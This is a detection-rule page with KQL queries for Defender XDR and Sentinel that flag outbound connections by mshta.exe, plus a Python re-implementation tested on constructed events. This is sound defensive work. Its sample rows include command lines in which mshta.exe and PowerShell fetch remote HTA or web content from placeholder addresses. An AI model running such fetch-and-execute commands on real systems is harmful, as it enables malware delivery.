
# Outbound MSHTA Connection

## Query Information

#### MITRE ATT&CK Technique(s)

| Technique ID | Title    | Link    |
| ---  | --- | --- |
| T1218.005 | System Binary Proxy Execution: Mshta | https://attack.mitre.org/techniques/T1218/005/ |

#### Description
Detects outbound network connections initiated by `mshta.exe`. `mshta.exe` is a legitimate Windows binary, but it is frequently abused by adversaries to execute malicious script content from local or remote HTA resources.

This query surfaces mshta.exe executions that warrant investigation: the binary rarely has a legitimate reason to reach public addresses, so hits should be infrequent in most environments.

Investigate whether mshta.exe can be blocked in your organization. Where that is not feasible, use automatic isolation rules for devices that show suspicious outbound mshta connections.

#### Risk
Adversaries often abuse mshta.exe, a living-off-the-land binary (LOLBin), as a malware dropper: the HTA content it executes fetches and launches the next-stage payload.

#### References
- https://redcanary.com/threat-detection-report/techniques/mshta/

## Defender XDR
```KQL
// Network events whose initiating process is mshta.exe (=~ is case-insensitive)
DeviceNetworkEvents
| where InitiatingProcessFileName =~ "mshta.exe"
// Keep only destinations outside private address space. ipv4_is_private() is
// null for IPv6 addresses, so IPv6 destinations are kept only via RemoteIPType.
| where RemoteIPType == "Public" or not(ipv4_is_private(RemoteIP))
| project-reorder Timestamp, InitiatingProcessCommandLine, RemoteUrl, RemoteIP, DeviceName, InitiatingProcessAccountUpn
```

## Sentinel
```KQL
DeviceNetworkEvents
| where InitiatingProcessFileName =~ "mshta.exe"
| where RemoteIPType == "Public" or not(ipv4_is_private(RemoteIP))
| project-reorder TimeGenerated, InitiatingProcessCommandLine, RemoteUrl, RemoteIP, DeviceName, InitiatingProcessAccountUpn
```

## Explanation

This query detects outbound network connections initiated by the Windows binary mshta.exe. Although mshta.exe is a legitimate tool for running HTML Applications (HTA), attackers abuse it to execute malicious script content, and a connection from it to a public IP address is a strong indicator of that abuse.

The query filters DeviceNetworkEvents for rows whose initiating process is mshta.exe (the `=~` comparison is case-insensitive) and whose destination is public, either because RemoteIPType is "Public" or because ipv4_is_private() reports that the address is not in a private (RFC 1918) range. Two details matter when tuning it: ipv4_is_private() returns null for IPv6 addresses, so IPv6 destinations are only kept through the RemoteIPType check, and no ActionType filter is applied, so failed or blocked connection attempts appear alongside successful ones. The results are then reordered so that the event timestamp, the command line that launched the process, the remote URL and IP address, the device name, and the account that ran the process appear first.

The goal of this query is to help security teams identify and investigate potentially harmful use of mshta.exe in their network, and to consider implementing measures such as blocking mshta.exe or setting up automatic isolation rules for suspicious connections.
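To make the filtering behaviour concrete, here is the same detection logic reproduced in Python and run over a handful of constructed DeviceNetworkEvents rows. This is an added example, not code from the original page or from the query's author. It assumes KQL's documented semantics: `ipv4_is_private()` treats only the three RFC 1918 ranges as private and returns null for anything that is not a valid IPv4 address, and `where` drops rows whose predicate evaluates to null (so `false or not(null)` excludes the row). The hostnames, accounts and addresses in the sample rows are placeholders.

```python
"""Added example: the Outbound MSHTA query's logic re-implemented in Python and
run over constructed DeviceNetworkEvents rows (not real telemetry)."""
import ipaddress
from typing import Optional

# The only ranges KQL's ipv4_is_private() treats as private (RFC 1918).
# Python's IPv4Address.is_private is broader (loopback, link-local, 100.64/10),
# so it is deliberately not used here.
_RFC1918 = [ipaddress.ip_network(n)
            for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Columns the query moves to the front with project-reorder.
PROJECTED_FIRST = ["Timestamp", "InitiatingProcessCommandLine", "RemoteUrl",
                   "RemoteIP", "DeviceName", "InitiatingProcessAccountUpn"]

# Constructed sample rows. 203.0.113.0/24 and 198.51.100.0/24 are IPv4
# documentation ranges; 2001:db8::/32 is the IPv6 documentation prefix.
SAMPLE_EVENTS = [
    {"Timestamp": "2024-01-01T10:00:00Z", "InitiatingProcessFileName": "MSHTA.EXE",
     "InitiatingProcessCommandLine": "mshta.exe https://203.0.113.10/a.hta",
     "RemoteUrl": "203.0.113.10", "RemoteIP": "203.0.113.10", "RemoteIPType": "Public",
     "DeviceName": "ws01", "InitiatingProcessAccountUpn": "alice@example.test"},
    {"Timestamp": "2024-01-01T10:01:00Z", "InitiatingProcessFileName": "mshta.exe",
     "InitiatingProcessCommandLine": "mshta.exe \\\\fs01\\share\\tool.hta",
     "RemoteUrl": "", "RemoteIP": "192.168.1.20", "RemoteIPType": "Private",
     "DeviceName": "ws01", "InitiatingProcessAccountUpn": "alice@example.test"},
    {"Timestamp": "2024-01-01T10:02:00Z", "InitiatingProcessFileName": "mshta.exe",
     "InitiatingProcessCommandLine": "mshta.exe http://[2001:db8::1]/b.hta",
     "RemoteUrl": "", "RemoteIP": "2001:db8::1", "RemoteIPType": "Public",
     "DeviceName": "ws02", "InitiatingProcessAccountUpn": "bob@example.test"},
    {"Timestamp": "2024-01-01T10:03:00Z", "InitiatingProcessFileName": "mshta.exe",
     "InitiatingProcessCommandLine": "mshta.exe http://[2001:db8::2]/c.hta",
     "RemoteUrl": "", "RemoteIP": "2001:db8::2", "RemoteIPType": "",
     "DeviceName": "ws02", "InitiatingProcessAccountUpn": "bob@example.test"},
    {"Timestamp": "2024-01-01T10:04:00Z", "InitiatingProcessFileName": "powershell.exe",
     "InitiatingProcessCommandLine": "powershell.exe -c iwr https://203.0.113.10/",
     "RemoteUrl": "203.0.113.10", "RemoteIP": "203.0.113.10", "RemoteIPType": "Public",
     "DeviceName": "ws03", "InitiatingProcessAccountUpn": "carol@example.test"},
    {"Timestamp": "2024-01-01T10:05:00Z", "InitiatingProcessFileName": "mshta.exe",
     "InitiatingProcessCommandLine": "mshta.exe http://198.51.100.7/d.hta",
     "RemoteUrl": "198.51.100.7", "RemoteIP": "198.51.100.7", "RemoteIPType": "",
     "DeviceName": "ws03", "InitiatingProcessAccountUpn": "carol@example.test"},
]


def ipv4_is_private(ip: str) -> Optional[bool]:
    """Mimic KQL ipv4_is_private(): True/False for an IPv4 address, None (KQL
    null) for anything else, including IPv6 addresses and empty strings."""
    try:
        addr = ipaddress.IPv4Address(ip)
    except ValueError:
        return None
    return any(addr in net for net in _RFC1918)


def is_outbound_mshta(event: dict) -> bool:
    """Apply the query's two where clauses, including KQL's null handling."""
    # `=~` is a case-insensitive string comparison.
    if event.get("InitiatingProcessFileName", "").lower() != "mshta.exe":
        return False
    if event.get("RemoteIPType") == "Public":
        return True
    private = ipv4_is_private(event.get("RemoteIP", ""))
    # not(null) is null and `false or null` is null, so where() drops the row.
    if private is None:
        return False
    return not private


def project_reorder(event: dict) -> dict:
    """Move the projected columns to the front; keep every other column after."""
    ordered = {k: event[k] for k in PROJECTED_FIRST if k in event}
    ordered.update({k: v for k, v in event.items() if k not in ordered})
    return ordered


def run_query(events) -> list:
    """Rows the KQL query would return, in the order of the input."""
    return [project_reorder(e) for e in events if is_outbound_mshta(e)]


if __name__ == "__main__":
    for row in run_query(SAMPLE_EVENTS):
        print(row["Timestamp"], row["DeviceName"], row["RemoteIP"],
              row["InitiatingProcessCommandLine"])
```

Of the six constructed rows, three survive: the uppercase `MSHTA.EXE` connection to a public IPv4, the IPv6 connection tagged `Public`, and the public IPv4 with an empty RemoteIPType. The IPv6 row with an empty RemoteIPType is dropped, which is the gap to keep in mind if your telemetry does not always populate that column.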

## Details


Bert-Jan Pals

Released: May 10, 2026

Tables: DeviceNetworkEvents

Keywords: DeviceNetworkEvents, RemoteIP, RemoteUrl, DeviceName, InitiatingProcessCommandLine, InitiatingProcessAccountUpn

Operators: =~, ==, or, not, ipv4_is_private(), project-reorder
